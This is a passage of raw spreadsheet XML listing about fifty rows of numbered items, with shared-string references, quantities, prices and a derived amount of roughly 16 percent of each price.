        <v>4</v>
      </c>
      <c r="I2179" s="14">
        <v>7.74</v>
      </c>
      <c r="J2179" s="15">
        <v>1.2416</v>
      </c>
      <c r="K2179" s="16"/>
    </row>
    <row r="2180" spans="2:11">
      <c r="B2180" s="9">
        <v>2214</v>
      </c>
      <c r="C2180" s="238" t="s">
        <v>10692</v>
      </c>
      <c r="D2180" s="238" t="s">
        <v>10693</v>
      </c>
      <c r="E2180" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2180" s="238" t="s">
        <v>10694</v>
      </c>
      <c r="G2180" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2180" s="10">
        <v>200</v>
      </c>
      <c r="I2180" s="14">
        <v>32</v>
      </c>
      <c r="J2180" s="15">
        <v>5.12</v>
      </c>
      <c r="K2180" s="16"/>
    </row>
    <row r="2181" spans="2:11">
      <c r="B2181" s="9">
        <v>2215</v>
      </c>
      <c r="C2181" s="238" t="s">
        <v>10695</v>
      </c>
      <c r="D2181" s="238" t="s">
        <v>10696</v>
      </c>
      <c r="E2181" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2181" s="238" t="s">
        <v>10697</v>
      </c>
      <c r="G2181" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2181" s="10">
        <v>70</v>
      </c>
      <c r="I2181" s="14">
        <v>216.04</v>
      </c>
      <c r="J2181" s="15">
        <v>34.608</v>
      </c>
      <c r="K2181" s="16"/>
    </row>
    <row r="2182" spans="2:11">
      <c r="B2182" s="9">
        <v>2216</v>
      </c>
      <c r="C2182" s="238" t="s">
        <v>10698</v>
      </c>
      <c r="D2182" s="238" t="s">
        <v>10699</v>
      </c>
      <c r="E2182" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2182" s="238" t="s">
        <v>10700</v>
      </c>
      <c r="G2182" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2182" s="10">
        <v>150</v>
      </c>
      <c r="I2182" s="14">
        <v>547.21</v>
      </c>
      <c r="J2182" s="15">
        <v>87.6</v>
      </c>
      <c r="K2182" s="16"/>
    </row>
    <row r="2183" spans="2:11">
      <c r="B2183" s="9">
        <v>2217</v>
      </c>
      <c r="C2183" s="238" t="s">
        <v>10701</v>
      </c>
      <c r="D2183" s="238" t="s">
        <v>10702</v>
      </c>
      <c r="E2183" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2183" s="238" t="s">
        <v>10703</v>
      </c>
      <c r="G2183" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2183" s="10">
        <v>40</v>
      </c>
      <c r="I2183" s="14">
        <v>12.17</v>
      </c>
      <c r="J2183" s="15">
        <v>1.92</v>
      </c>
      <c r="K2183" s="16"/>
    </row>
    <row r="2184" spans="2:11">
      <c r="B2184" s="9">
        <v>2218</v>
      </c>
      <c r="C2184" s="238" t="s">
        <v>10704</v>
      </c>
      <c r="D2184" s="238" t="s">
        <v>10705</v>
      </c>
      <c r="E2184" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2184" s="238" t="s">
        <v>10706</v>
      </c>
      <c r="G2184" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2184" s="10">
        <v>22</v>
      </c>
      <c r="I2184" s="14">
        <v>1903.31</v>
      </c>
      <c r="J2184" s="15">
        <v>304.5152</v>
      </c>
      <c r="K2184" s="16"/>
    </row>
    <row r="2185" spans="2:11">
      <c r="B2185" s="9">
        <v>2219</v>
      </c>
      <c r="C2185" s="238" t="s">
        <v>10707</v>
      </c>
      <c r="D2185" s="238" t="s">
        <v>10708</v>
      </c>
      <c r="E2185" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2185" s="238" t="s">
        <v>10709</v>
      </c>
      <c r="G2185" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2185" s="10">
        <v>85</v>
      </c>
      <c r="I2185" s="14">
        <v>263.92</v>
      </c>
      <c r="J2185" s="15">
        <v>42.16</v>
      </c>
      <c r="K2185" s="16"/>
    </row>
    <row r="2186" spans="2:11">
      <c r="B2186" s="9">
        <v>2220</v>
      </c>
      <c r="C2186" s="238" t="s">
        <v>10710</v>
      </c>
      <c r="D2186" s="238" t="s">
        <v>10711</v>
      </c>
      <c r="E2186" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2186" s="238" t="s">
        <v>10712</v>
      </c>
      <c r="G2186" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2186" s="10">
        <v>99</v>
      </c>
      <c r="I2186" s="14">
        <v>31.83</v>
      </c>
      <c r="J2186" s="15">
        <v>5.0688</v>
      </c>
      <c r="K2186" s="16"/>
    </row>
    <row r="2187" spans="2:11">
      <c r="B2187" s="9">
        <v>2221</v>
      </c>
      <c r="C2187" s="238" t="s">
        <v>10713</v>
      </c>
      <c r="D2187" s="238" t="s">
        <v>10714</v>
      </c>
      <c r="E2187" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2187" s="238" t="s">
        <v>10715</v>
      </c>
      <c r="G2187" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2187" s="10">
        <v>30</v>
      </c>
      <c r="I2187" s="14">
        <v>72</v>
      </c>
      <c r="J2187" s="15">
        <v>11.52</v>
      </c>
      <c r="K2187" s="16"/>
    </row>
    <row r="2188" spans="2:11">
      <c r="B2188" s="9">
        <v>2222</v>
      </c>
      <c r="C2188" s="238" t="s">
        <v>10716</v>
      </c>
      <c r="D2188" s="238" t="s">
        <v>10717</v>
      </c>
      <c r="E2188" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2188" s="238" t="s">
        <v>10718</v>
      </c>
      <c r="G2188" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2188" s="10">
        <v>55</v>
      </c>
      <c r="I2188" s="14">
        <v>186.75</v>
      </c>
      <c r="J2188" s="15">
        <v>29.92</v>
      </c>
      <c r="K2188" s="16"/>
    </row>
    <row r="2189" spans="2:11">
      <c r="B2189" s="9">
        <v>2223</v>
      </c>
      <c r="C2189" s="238" t="s">
        <v>10719</v>
      </c>
      <c r="D2189" s="238" t="s">
        <v>10720</v>
      </c>
      <c r="E2189" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2189" s="238" t="s">
        <v>10721</v>
      </c>
      <c r="G2189" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2189" s="10">
        <v>89</v>
      </c>
      <c r="I2189" s="14">
        <v>170.88</v>
      </c>
      <c r="J2189" s="15">
        <v>27.3408</v>
      </c>
      <c r="K2189" s="16"/>
    </row>
    <row r="2190" spans="2:11">
      <c r="B2190" s="9">
        <v>2224</v>
      </c>
      <c r="C2190" s="238" t="s">
        <v>10722</v>
      </c>
      <c r="D2190" s="238" t="s">
        <v>10723</v>
      </c>
      <c r="E2190" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2190" s="238" t="s">
        <v>10724</v>
      </c>
      <c r="G2190" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2190" s="10">
        <v>50</v>
      </c>
      <c r="I2190" s="14">
        <v>540.17</v>
      </c>
      <c r="J2190" s="15">
        <v>86.4</v>
      </c>
      <c r="K2190" s="16"/>
    </row>
    <row r="2191" spans="2:11">
      <c r="B2191" s="9">
        <v>2225</v>
      </c>
      <c r="C2191" s="238" t="s">
        <v>10725</v>
      </c>
      <c r="D2191" s="238" t="s">
        <v>10726</v>
      </c>
      <c r="E2191" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2191" s="238" t="s">
        <v>10727</v>
      </c>
      <c r="G2191" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2191" s="10">
        <v>25</v>
      </c>
      <c r="I2191" s="14">
        <v>112.84</v>
      </c>
      <c r="J2191" s="15">
        <v>18.04</v>
      </c>
      <c r="K2191" s="16"/>
    </row>
    <row r="2192" spans="2:11">
      <c r="B2192" s="9">
        <v>2226</v>
      </c>
      <c r="C2192" s="238" t="s">
        <v>10728</v>
      </c>
      <c r="D2192" s="238" t="s">
        <v>10729</v>
      </c>
      <c r="E2192" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2192" s="238" t="s">
        <v>10730</v>
      </c>
      <c r="G2192" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2192" s="10">
        <v>74</v>
      </c>
      <c r="I2192" s="14">
        <v>215.55</v>
      </c>
      <c r="J2192" s="15">
        <v>34.4544</v>
      </c>
      <c r="K2192" s="16"/>
    </row>
    <row r="2193" spans="2:11">
      <c r="B2193" s="9">
        <v>2227</v>
      </c>
      <c r="C2193" s="238" t="s">
        <v>10731</v>
      </c>
      <c r="D2193" s="238" t="s">
        <v>10732</v>
      </c>
      <c r="E2193" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2193" s="238" t="s">
        <v>10733</v>
      </c>
      <c r="G2193" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2193" s="10">
        <v>109</v>
      </c>
      <c r="I2193" s="14">
        <v>910.2</v>
      </c>
      <c r="J2193" s="15">
        <v>145.624</v>
      </c>
      <c r="K2193" s="16"/>
    </row>
    <row r="2194" spans="2:11">
      <c r="B2194" s="9">
        <v>2228</v>
      </c>
      <c r="C2194" s="238" t="s">
        <v>10734</v>
      </c>
      <c r="D2194" s="238" t="s">
        <v>10735</v>
      </c>
      <c r="E2194" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2194" s="238" t="s">
        <v>10736</v>
      </c>
      <c r="G2194" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2194" s="10">
        <v>25</v>
      </c>
      <c r="I2194" s="14">
        <v>230.48</v>
      </c>
      <c r="J2194" s="15">
        <v>36.88</v>
      </c>
      <c r="K2194" s="16"/>
    </row>
    <row r="2195" spans="2:11">
      <c r="B2195" s="9">
        <v>2229</v>
      </c>
      <c r="C2195" s="238" t="s">
        <v>10737</v>
      </c>
      <c r="D2195" s="238" t="s">
        <v>10738</v>
      </c>
      <c r="E2195" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2195" s="238" t="s">
        <v>8355</v>
      </c>
      <c r="G2195" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2195" s="10">
        <v>300</v>
      </c>
      <c r="I2195" s="14">
        <v>1310.68</v>
      </c>
      <c r="J2195" s="15">
        <v>209.76</v>
      </c>
      <c r="K2195" s="16"/>
    </row>
    <row r="2196" spans="2:11">
      <c r="B2196" s="9">
        <v>2230</v>
      </c>
      <c r="C2196" s="238" t="s">
        <v>10739</v>
      </c>
      <c r="D2196" s="238" t="s">
        <v>10740</v>
      </c>
      <c r="E2196" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2196" s="238" t="s">
        <v>10741</v>
      </c>
      <c r="G2196" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2196" s="10">
        <v>50</v>
      </c>
      <c r="I2196" s="14">
        <v>1019.42</v>
      </c>
      <c r="J2196" s="15">
        <v>163.12</v>
      </c>
      <c r="K2196" s="16"/>
    </row>
    <row r="2197" spans="2:11">
      <c r="B2197" s="9">
        <v>2231</v>
      </c>
      <c r="C2197" s="238" t="s">
        <v>10742</v>
      </c>
      <c r="D2197" s="238" t="s">
        <v>10743</v>
      </c>
      <c r="E2197" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2197" s="238" t="s">
        <v>10744</v>
      </c>
      <c r="G2197" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2197" s="10">
        <v>150</v>
      </c>
      <c r="I2197" s="14">
        <v>1972.68</v>
      </c>
      <c r="J2197" s="15">
        <v>315.6</v>
      </c>
      <c r="K2197" s="16"/>
    </row>
    <row r="2198" spans="2:11">
      <c r="B2198" s="9">
        <v>2232</v>
      </c>
      <c r="C2198" s="238" t="s">
        <v>10745</v>
      </c>
      <c r="D2198" s="238" t="s">
        <v>10746</v>
      </c>
      <c r="E2198" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2198" s="238" t="s">
        <v>10747</v>
      </c>
      <c r="G2198" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2198" s="10">
        <v>34</v>
      </c>
      <c r="I2198" s="14">
        <v>59.81</v>
      </c>
      <c r="J2198" s="15">
        <v>9.5744</v>
      </c>
      <c r="K2198" s="16"/>
    </row>
    <row r="2199" spans="2:11">
      <c r="B2199" s="9">
        <v>2233</v>
      </c>
      <c r="C2199" s="238" t="s">
        <v>10748</v>
      </c>
      <c r="D2199" s="238" t="s">
        <v>10669</v>
      </c>
      <c r="E2199" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2199" s="238" t="s">
        <v>10670</v>
      </c>
      <c r="G2199" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2199" s="10">
        <v>122</v>
      </c>
      <c r="I2199" s="14">
        <v>78.51</v>
      </c>
      <c r="J2199" s="15">
        <v>12.4928</v>
      </c>
      <c r="K2199" s="16"/>
    </row>
    <row r="2200" spans="2:11">
      <c r="B2200" s="9">
        <v>2234</v>
      </c>
      <c r="C2200" s="238" t="s">
        <v>10749</v>
      </c>
      <c r="D2200" s="238" t="s">
        <v>10750</v>
      </c>
      <c r="E2200" s="238" t="s">
        <v>10751</v>
      </c>
      <c r="F2200" s="238" t="s">
        <v>10752</v>
      </c>
      <c r="G2200" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2200" s="10">
        <v>279</v>
      </c>
      <c r="I2200" s="14">
        <v>1847.81</v>
      </c>
      <c r="J2200" s="15">
        <v>295.5168</v>
      </c>
      <c r="K2200" s="16"/>
    </row>
    <row r="2201" spans="2:11">
      <c r="B2201" s="9">
        <v>2235</v>
      </c>
      <c r="C2201" s="238" t="s">
        <v>10753</v>
      </c>
      <c r="D2201" s="238" t="s">
        <v>10754</v>
      </c>
      <c r="E2201" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2201" s="238" t="s">
        <v>10755</v>
      </c>
      <c r="G2201" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2201" s="10">
        <v>100</v>
      </c>
      <c r="I2201" s="14">
        <v>1262.14</v>
      </c>
      <c r="J2201" s="15">
        <v>201.92</v>
      </c>
      <c r="K2201" s="16"/>
    </row>
    <row r="2202" spans="2:11">
      <c r="B2202" s="9">
        <v>2236</v>
      </c>
      <c r="C2202" s="238" t="s">
        <v>10756</v>
      </c>
      <c r="D2202" s="238" t="s">
        <v>10757</v>
      </c>
      <c r="E2202" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2202" s="238" t="s">
        <v>10758</v>
      </c>
      <c r="G2202" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2202" s="10">
        <v>16</v>
      </c>
      <c r="I2202" s="14">
        <v>6.08</v>
      </c>
      <c r="J2202" s="15">
        <v>0.9728</v>
      </c>
      <c r="K2202" s="16"/>
    </row>
    <row r="2203" spans="2:11">
      <c r="B2203" s="9">
        <v>2237</v>
      </c>
      <c r="C2203" s="238" t="s">
        <v>10759</v>
      </c>
      <c r="D2203" s="238" t="s">
        <v>10760</v>
      </c>
      <c r="E2203" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2203" s="238" t="s">
        <v>10761</v>
      </c>
      <c r="G2203" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2203" s="10">
        <v>190</v>
      </c>
      <c r="I2203" s="14">
        <v>49.87</v>
      </c>
      <c r="J2203" s="15">
        <v>7.904</v>
      </c>
      <c r="K2203" s="16"/>
    </row>
    <row r="2204" spans="2:11">
      <c r="B2204" s="9">
        <v>2238</v>
      </c>
      <c r="C2204" s="238" t="s">
        <v>10762</v>
      </c>
      <c r="D2204" s="238" t="s">
        <v>10763</v>
      </c>
      <c r="E2204" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2204" s="238" t="s">
        <v>10764</v>
      </c>
      <c r="G2204" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2204" s="10">
        <v>30</v>
      </c>
      <c r="I2204" s="14">
        <v>167.11</v>
      </c>
      <c r="J2204" s="15">
        <v>26.736</v>
      </c>
      <c r="K2204" s="16"/>
    </row>
    <row r="2205" spans="2:11">
      <c r="B2205" s="9">
        <v>2239</v>
      </c>
      <c r="C2205" s="238" t="s">
        <v>10765</v>
      </c>
      <c r="D2205" s="238" t="s">
        <v>10766</v>
      </c>
      <c r="E2205" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2205" s="238" t="s">
        <v>10767</v>
      </c>
      <c r="G2205" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2205" s="10">
        <v>127</v>
      </c>
      <c r="I2205" s="14">
        <v>619.07</v>
      </c>
      <c r="J2205" s="15">
        <v>98.9584</v>
      </c>
      <c r="K2205" s="16"/>
    </row>
    <row r="2206" spans="2:11">
      <c r="B2206" s="9">
        <v>2240</v>
      </c>
      <c r="C2206" s="238" t="s">
        <v>10768</v>
      </c>
      <c r="D2206" s="238" t="s">
        <v>10769</v>
      </c>
      <c r="E2206" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2206" s="238" t="s">
        <v>10770</v>
      </c>
      <c r="G2206" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2206" s="10">
        <v>100</v>
      </c>
      <c r="I2206" s="14">
        <v>873.79</v>
      </c>
      <c r="J2206" s="15">
        <v>139.84</v>
      </c>
      <c r="K2206" s="16"/>
    </row>
    <row r="2207" spans="2:11">
      <c r="B2207" s="9">
        <v>2241</v>
      </c>
      <c r="C2207" s="238" t="s">
        <v>10771</v>
      </c>
      <c r="D2207" s="238" t="s">
        <v>10772</v>
      </c>
      <c r="E2207" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2207" s="238" t="s">
        <v>10773</v>
      </c>
      <c r="G2207" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2207" s="10">
        <v>76</v>
      </c>
      <c r="I2207" s="14">
        <v>94.28</v>
      </c>
      <c r="J2207" s="15">
        <v>15.0784</v>
      </c>
      <c r="K2207" s="16"/>
    </row>
    <row r="2208" spans="2:11">
      <c r="B2208" s="9">
        <v>2242</v>
      </c>
      <c r="C2208" s="238" t="s">
        <v>10774</v>
      </c>
      <c r="D2208" s="238" t="s">
        <v>10775</v>
      </c>
      <c r="E2208" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2208" s="238" t="s">
        <v>10776</v>
      </c>
      <c r="G2208" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2208" s="10">
        <v>77</v>
      </c>
      <c r="I2208" s="14">
        <v>92.1</v>
      </c>
      <c r="J2208" s="15">
        <v>14.784</v>
      </c>
      <c r="K2208" s="16"/>
    </row>
    <row r="2209" spans="2:11">
      <c r="B2209" s="9">
        <v>2243</v>
      </c>
      <c r="C2209" s="238" t="s">
        <v>10777</v>
      </c>
      <c r="D2209" s="238" t="s">
        <v>10778</v>
      </c>
      <c r="E2209" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2209" s="238" t="s">
        <v>10779</v>
      </c>
      <c r="G2209" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2209" s="10">
        <v>25</v>
      </c>
      <c r="I2209" s="14">
        <v>258.79</v>
      </c>
      <c r="J2209" s="15">
        <v>41.4</v>
      </c>
      <c r="K2209" s="16"/>
    </row>
    <row r="2210" spans="2:11">
      <c r="B2210" s="9">
        <v>2244</v>
      </c>
      <c r="C2210" s="238" t="s">
        <v>10780</v>
      </c>
      <c r="D2210" s="238" t="s">
        <v>10781</v>
      </c>
      <c r="E2210" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2210" s="238" t="s">
        <v>10782</v>
      </c>
      <c r="G2210" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2210" s="10">
        <v>149</v>
      </c>
      <c r="I2210" s="14">
        <v>416.44</v>
      </c>
      <c r="J2210" s="15">
        <v>66.5136</v>
      </c>
      <c r="K2210" s="16"/>
    </row>
    <row r="2211" spans="2:11">
      <c r="B2211" s="9">
        <v>2245</v>
      </c>
      <c r="C2211" s="238" t="s">
        <v>10783</v>
      </c>
      <c r="D2211" s="238" t="s">
        <v>10784</v>
      </c>
      <c r="E2211" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2211" s="238" t="s">
        <v>10785</v>
      </c>
      <c r="G2211" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2211" s="10">
        <v>127</v>
      </c>
      <c r="I2211" s="14">
        <v>426.37</v>
      </c>
      <c r="J2211" s="15">
        <v>68.2752</v>
      </c>
      <c r="K2211" s="16"/>
    </row>
    <row r="2212" spans="2:11">
      <c r="B2212" s="9">
        <v>2246</v>
      </c>
      <c r="C2212" s="238" t="s">
        <v>10786</v>
      </c>
      <c r="D2212" s="238" t="s">
        <v>10787</v>
      </c>
      <c r="E2212" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2212" s="238" t="s">
        <v>10788</v>
      </c>
      <c r="G2212" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2212" s="10">
        <v>190</v>
      </c>
      <c r="I2212" s="14">
        <v>335.93</v>
      </c>
      <c r="J2212" s="15">
        <v>53.808</v>
      </c>
      <c r="K2212" s="16"/>
    </row>
    <row r="2213" spans="2:11">
      <c r="B2213" s="9">
        <v>2247</v>
      </c>
      <c r="C2213" s="238" t="s">
        <v>10789</v>
      </c>
      <c r="D2213" s="238" t="s">
        <v>10790</v>
      </c>
      <c r="E2213" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2213" s="238" t="s">
        <v>10791</v>
      </c>
      <c r="G2213" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2213" s="10">
        <v>5</v>
      </c>
      <c r="I2213" s="14">
        <v>35.91</v>
      </c>
      <c r="J2213" s="15">
        <v>5.744</v>
      </c>
      <c r="K2213" s="16"/>
    </row>
    <row r="2214" spans="2:11">
      <c r="B2214" s="9">
        <v>2248</v>
      </c>
      <c r="C2214" s="238" t="s">
        <v>10792</v>
      </c>
      <c r="D2214" s="238" t="s">
        <v>10793</v>
      </c>
      <c r="E2214" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2214" s="238" t="s">
        <v>10794</v>
      </c>
      <c r="G2214" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2214" s="10">
        <v>190</v>
      </c>
      <c r="I2214" s="14">
        <v>141.31</v>
      </c>
      <c r="J2214" s="15">
        <v>22.496</v>
      </c>
      <c r="K2214" s="16"/>
    </row>
    <row r="2215" spans="2:11">
      <c r="B2215" s="9">
        <v>2249</v>
      </c>
      <c r="C2215" s="238" t="s">
        <v>10795</v>
      </c>
      <c r="D2215" s="238" t="s">
        <v>10796</v>
      </c>
      <c r="E2215" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2215" s="238" t="s">
        <v>10797</v>
      </c>
      <c r="G2215" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2215" s="10">
        <v>40</v>
      </c>
      <c r="I2215" s="14">
        <v>34.37</v>
      </c>
      <c r="J2215" s="15">
        <v>5.504</v>
      </c>
      <c r="K2215" s="16"/>
    </row>
    <row r="2216" spans="2:11">
      <c r="B2216" s="9">
        <v>2250</v>
      </c>
      <c r="C2216" s="238" t="s">
        <v>10798</v>
      </c>
      <c r="D2216" s="238" t="s">
        <v>10799</v>
      </c>
      <c r="E2216" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2216" s="238" t="s">
        <v>10800</v>
      </c>
      <c r="G2216" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2216" s="10">
        <v>28</v>
      </c>
      <c r="I2216" s="14">
        <v>49.85</v>
      </c>
      <c r="J2216" s="15">
        <v>7.9744</v>
      </c>
      <c r="K2216" s="16"/>
    </row>
    <row r="2217" spans="2:11">
      <c r="B2217" s="9">
        <v>2251</v>
      </c>
      <c r="C2217" s="238" t="s">
        <v>10801</v>
      </c>
      <c r="D2217" s="238" t="s">
        <v>10802</v>
      </c>
      <c r="E2217" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2217" s="238" t="s">
        <v>10803</v>
      </c>
      <c r="G2217" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2217" s="10">
        <v>20</v>
      </c>
      <c r="I2217" s="14">
        <v>94.04</v>
      </c>
      <c r="J2217" s="15">
        <v>15.04</v>
      </c>
      <c r="K2217" s="16"/>
    </row>
    <row r="2218" spans="2:11">
      <c r="B2218" s="9">
        <v>2252</v>
      </c>
      <c r="C2218" s="238" t="s">
        <v>10804</v>
      </c>
      <c r="D2218" s="238" t="s">
        <v>10805</v>
      </c>
      <c r="E2218" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2218" s="238" t="s">
        <v>10806</v>
      </c>
      <c r="G2218" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2218" s="10">
        <v>35</v>
      </c>
      <c r="I2218" s="14">
        <v>110.03</v>
      </c>
      <c r="J2218" s="15">
        <v>17.584</v>
      </c>
      <c r="K2218" s="16"/>
    </row>
    <row r="2219" spans="2:11">
      <c r="B2219" s="9">
        <v>2253</v>
      </c>
      <c r="C2219" s="238" t="s">
        <v>10807</v>
      </c>
      <c r="D2219" s="238" t="s">
        <v>10808</v>
      </c>
      <c r="E2219" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2219" s="238" t="s">
        <v>10809</v>
      </c>
      <c r="G2219" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2219" s="10">
        <v>6</v>
      </c>
      <c r="I2219" s="14">
        <v>1048.55</v>
      </c>
      <c r="J2219" s="15">
        <v>167.7696</v>
      </c>
      <c r="K2219" s="16"/>
    </row>
    <row r="2220" spans="2:11">
      <c r="B2220" s="9">
        <v>2254</v>
      </c>
      <c r="C2220" s="238" t="s">
        <v>10810</v>
      </c>
      <c r="D2220" s="238" t="s">
        <v>10811</v>
      </c>
      <c r="E2220" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2220" s="238" t="s">
        <v>10812</v>
      </c>
      <c r="G2220" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2220" s="10">
        <v>165</v>
      </c>
      <c r="I2220" s="14">
        <v>282.03</v>
      </c>
      <c r="J2220" s="15">
        <v>45.144</v>
      </c>
      <c r="K2220" s="16"/>
    </row>
    <row r="2221" spans="2:11">
      <c r="B2221" s="9">
        <v>2255</v>
      </c>
      <c r="C2221" s="238" t="s">
        <v>10813</v>
      </c>
      <c r="D2221" s="238" t="s">
        <v>10814</v>
      </c>
      <c r="E2221" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2221" s="238" t="s">
        <v>10815</v>
      </c>
      <c r="G2221" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2221" s="10">
        <v>15</v>
      </c>
      <c r="I2221" s="14">
        <v>15.47</v>
      </c>
      <c r="J2221" s="15">
        <v>2.472</v>
      </c>
      <c r="K2221" s="16"/>
    </row>
    <row r="2222" spans="2:11">
      <c r="B2222" s="9">
        <v>2256</v>
      </c>
      <c r="C2222" s="238" t="s">
        <v>10816</v>
      </c>
      <c r="D2222" s="238" t="s">
        <v>10817</v>
      </c>
      <c r="E2222" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2222" s="238" t="s">
        <v>10818</v>
      </c>
      <c r="G2222" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2222" s="10">
        <v>6</v>
      </c>
      <c r="I2222" s="14">
        <v>2222.13</v>
      </c>
      <c r="J2222" s="15">
        <v>355.5456</v>
      </c>
      <c r="K2222" s="16"/>
    </row>
    <row r="2223" spans="2:11">
      <c r="B2223" s="9">
        <v>2257</v>
      </c>
      <c r="C2223" s="238" t="s">
        <v>10819</v>
      </c>
      <c r="D2223" s="238" t="s">
        <v>10820</v>
      </c>
      <c r="E2223" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2223" s="238" t="s">
        <v>10821</v>
      </c>
      <c r="G2223" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2223" s="10">
        <v>5</v>
      </c>
      <c r="I2223" s="14">
        <v>1109.76</v>
      </c>
      <c r="J2223" s="15">
        <v>177.56</v>
      </c>
      <c r="K2223" s="16"/>
    </row>
    <row r="2224" spans="2:11">
      <c r="B2224" s="9">
        <v>2258</v>
      </c>
      <c r="C2224" s="238" t="s">
        <v>10822</v>
      </c>
      <c r="D2224" s="238" t="s">
        <v>10823</v>
      </c>
      <c r="E2224" s="238" t="s">
        <v>10824</v>
      </c>
      <c r="F2224" s="238" t="s">
        <v>10825</v>
      </c>
      <c r="G2224" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2224" s="10">
        <v>4</v>
      </c>
      <c r="I2224" s="14">
        <v>2341.88</v>
      </c>
      <c r="J2224" s="15">
        <v>374.7008</v>
      </c>
      <c r="K2224" s="16"/>
    </row>
    <row r="2225" spans="2:11">
      <c r="B2225" s="9">
        <v>2259</v>
      </c>
      <c r="C2225" s="238" t="s">
        <v>10826</v>
      </c>
      <c r="D2225" s="238" t="s">
        <v>10827</v>
      </c>
      <c r="E2225" s="238" t="s">
        <v>4755</v>
      </c>
      <c r="F2225" s="238" t="s">
        <v>10828</v>
      </c>
      <c r="G2225" s="237" t="s">
        <v>4760</v>
      </c>
      <c r="H2225" s="10">
        <v>10</v>
      </c>
      <c r="I2225" s="14">
        <v>2671.66</v>
      </c>
      <c r="J2225" s="15">
        <v>427.472</v>
      </c>
      <c r="K2225" s="16"/>
    </row>
    <row r="2226" spans="2:11">
      <c r="B2226" s="9">
        <v>2260</v>
      </c>
      <c r="C2226" s="238" t="s">
        <v>10829</v>
      </c>
      <c r="D2226" s="238" t="s">
        <v>10830</v>
      </c>
      <c r="E2226" s="238" t="s">
        <v>4755</v>
      </c>
      <c r="F2226" s="238" t="s">
        <v>10831</v>
      </c>
      <c r="G2226" s="237" t="s">
        <v>4760</v>
      </c>
      <c r="H2226" s="10">
        <v>9</v>
      </c>
      <c r="I2226" s="14">
